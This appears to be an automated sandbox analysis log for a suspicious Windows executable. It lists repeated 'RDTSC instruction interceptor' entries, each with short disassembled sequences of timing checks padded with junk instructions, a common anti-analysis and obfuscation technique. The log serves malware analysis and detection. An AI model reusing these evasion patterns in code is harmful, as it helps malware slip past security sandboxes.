Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40DD1 second address: 4E40DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40DEC second address: 4E40E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C908415Fh 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40E0B second address: 4E40E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40E13 second address: 4E40E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 26FAA311h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor eax, dword ptr [ebp+08h] 0x00000011 jmp 00007FA4C9084166h 0x00000016 and ecx, 1Fh 0x00000019 jmp 00007FA4C9084160h 0x0000001e ror eax, cl 0x00000020 jmp 00007FA4C9084160h 0x00000025 leave 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FA4C908415Dh 0x0000002f jmp 00007FA4C908415Bh 0x00000034 popfd 0x00000035 mov eax, 5F98C01Fh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E401F4 second address: 4E401F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E401F8 second address: 4E401FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E401FE second address: 4E40204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40204 second address: 4E40208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40208 second address: 4E40244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, 97h 0x0000000f movsx ebx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FA4C9026358h 0x0000001a mov eax, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40244 second address: 4E40248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E40248 second address: 4E4024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00040 second address: 4E00046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00046 second address: 4E000E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f pushfd 0x00000010 jmp 00007FA4C902634Dh 0x00000015 add al, FFFFFFC6h 0x00000018 jmp 00007FA4C9026351h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 push esi 0x00000022 mov ecx, ebx 0x00000024 pop edi 0x00000025 pushfd 0x00000026 jmp 00007FA4C9026354h 0x0000002b jmp 00007FA4C9026355h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007FA4C902634Eh 0x00000039 and esp, FFFFFFF8h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA4C9026357h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E000E6 second address: 4E0010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0010A second address: 4E0011D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0011D second address: 4E0015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C908415Fh 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA4C908415Eh 0x00000017 sub si, 6548h 0x0000001c jmp 00007FA4C908415Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0015A second address: 4E0015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0015F second address: 4E001B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C9084165h 0x00000009 jmp 00007FA4C908415Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FA4C9084168h 0x00000015 or ax, 9A08h 0x0000001a jmp 00007FA4C908415Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E001B8 second address: 4E001BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E001BC second address: 4E001D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E001D7 second address: 4E001DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E001DD second address: 4E001FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA4C9084163h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E001FB second address: 4E00221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA4C9026354h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00221 second address: 4E00227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00227 second address: 4E0022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0022B second address: 4E0025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FA4C9084166h 0x00000018 mov dword ptr [esp], esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0025E second address: 4E00263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00263 second address: 4E00269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00269 second address: 4E0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0026D second address: 4E00293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C9084169h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00293 second address: 4E002CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026357h 0x00000008 mov ah, 1Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 mov esi, 4FFC8CA1h 0x0000001c popad 0x0000001d mov dword ptr [esp], edi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E002CB second address: 4E002CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E002CF second address: 4E002E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E002E8 second address: 4E0031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9084167h 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA4C9084161h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E0031C second address: 4E00364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B6B462Ah 0x0000000f jmp 00007FA4C902634Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c mov cl, 36h 0x0000001e push edi 0x0000001f mov ax, 56A5h 0x00000023 pop eax 0x00000024 popad 0x00000025 je 00007FA53B6B461Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 mov bl, ah 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00364 second address: 4E00388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 pushad 0x00000011 mov dx, E92Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E00388 second address: 4E003DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 or edx, dword ptr [ebp+0Ch] 0x00000009 jmp 00007FA4C9026351h 0x0000000e test edx, 61000000h 0x00000014 pushad 0x00000015 mov eax, 5CF3F363h 0x0000001a mov di, cx 0x0000001d popad 0x0000001e jne 00007FA53B6B461Ch 0x00000024 pushad 0x00000025 mov ecx, 46B9EAB7h 0x0000002a mov di, cx 0x0000002d popad 0x0000002e test byte ptr [esi+48h], 00000001h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA4C9026355h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1001F second address: 4E1002E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1002E second address: 4E10046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10046 second address: 4E1004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1004A second address: 4E100AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FA4C9026357h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 mov esi, 33438017h 0x0000001b popad 0x0000001c and esp, FFFFFFF8h 0x0000001f jmp 00007FA4C902634Ah 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA4C902634Dh 0x0000002e sub ah, FFFFFFF6h 0x00000031 jmp 00007FA4C9026351h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E100AE second address: 4E100B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E100B3 second address: 4E10148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d pushfd 0x0000000e jmp 00007FA4C902634Ch 0x00000013 add eax, 1B61F648h 0x00000019 jmp 00007FA4C902634Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 mov eax, edi 0x00000024 popad 0x00000025 push esp 0x00000026 pushad 0x00000027 jmp 00007FA4C9026358h 0x0000002c pushfd 0x0000002d jmp 00007FA4C9026352h 0x00000032 and ax, 2B08h 0x00000037 jmp 00007FA4C902634Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [esp], esi 0x00000041 pushad 0x00000042 mov ebx, esi 0x00000044 popad 0x00000045 mov esi, dword ptr [ebp+08h] 0x00000048 jmp 00007FA4C902634Dh 0x0000004d sub ebx, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov dx, si 0x00000055 mov cx, 4A7Bh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10148 second address: 4E10158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10158 second address: 4E1015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1015C second address: 4E101ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FA4C9084167h 0x0000000f je 00007FA53B6FA367h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA4C9084164h 0x0000001c xor esi, 68B26558h 0x00000022 jmp 00007FA4C908415Bh 0x00000027 popfd 0x00000028 mov edx, ecx 0x0000002a popad 0x0000002b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000032 jmp 00007FA4C9084162h 0x00000037 mov ecx, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FA4C908415Dh 0x00000041 pop ecx 0x00000042 call 00007FA4C9084161h 0x00000047 pop ecx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E101ED second address: 4E10285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B69C4EAh 0x0000000f pushad 0x00000010 jmp 00007FA4C902634Eh 0x00000015 pushfd 0x00000016 jmp 00007FA4C9026352h 0x0000001b jmp 00007FA4C9026355h 0x00000020 popfd 0x00000021 popad 0x00000022 test byte ptr [77516968h], 00000002h 0x00000029 jmp 00007FA4C902634Eh 0x0000002e jne 00007FA53B69C4A9h 0x00000034 jmp 00007FA4C9026350h 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA4C9026357h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10285 second address: 4E1028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1028B second address: 4E1028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1028F second address: 4E102E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b pushfd 0x0000000c jmp 00007FA4C9084169h 0x00000011 add cl, 00000036h 0x00000014 jmp 00007FA4C9084161h 0x00000019 popfd 0x0000001a pop eax 0x0000001b mov al, dl 0x0000001d popad 0x0000001e mov dword ptr [esp], ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA4C908415Fh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E102E1 second address: 4E10392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov cl, 98h 0x0000000d pushfd 0x0000000e jmp 00007FA4C9026359h 0x00000013 and ecx, 5E411556h 0x00000019 jmp 00007FA4C9026351h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FA4C9026351h 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA4C902634Ch 0x0000002e or esi, 7297DEA8h 0x00000034 jmp 00007FA4C902634Bh 0x00000039 popfd 0x0000003a movzx eax, bx 0x0000003d popad 0x0000003e push dword ptr [ebp+14h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FA4C902634Ch 0x0000004a or ax, D108h 0x0000004f jmp 00007FA4C902634Bh 0x00000054 popfd 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10392 second address: 4E10397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10397 second address: 4E103C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9026355h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E103C4 second address: 4E103D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E103ED second address: 4E10445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C9026351h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA4C9026351h 0x0000000f xor esi, 2B952D96h 0x00000015 jmp 00007FA4C9026351h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop esi 0x0000001f jmp 00007FA4C902634Eh 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10445 second address: 4E10449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10449 second address: 4E1044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E1044F second address: 4E10456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10456 second address: 4E10499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esp, ebp 0x00000009 pushad 0x0000000a mov ah, 7Dh 0x0000000c pushfd 0x0000000d jmp 00007FA4C902634Fh 0x00000012 sub ecx, 6070242Eh 0x00000018 jmp 00007FA4C9026359h 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E10499 second address: 4E104D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA4C9084169h 0x0000000a and ecx, 42365316h 0x00000010 jmp 00007FA4C9084161h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71BFE second address: 4E71C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9026358h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71C38 second address: 4E71C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71C47 second address: 4E71C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71C5F second address: 4E71CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA4C908415Fh 0x00000013 sbb cl, 0000006Eh 0x00000016 jmp 00007FA4C9084169h 0x0000001b popfd 0x0000001c mov ecx, 1708D2F7h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 push esi 0x00000025 jmp 00007FA4C908415Fh 0x0000002a pop ecx 0x0000002b mov ebx, 6ED27D2Ch 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FA4C908415Bh 0x00000038 push 0000007Fh 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FA4C908415Bh 0x00000043 sub cx, 64DEh 0x00000048 jmp 00007FA4C9084169h 0x0000004d popfd 0x0000004e push eax 0x0000004f pop edi 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71D4C second address: 4E71D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
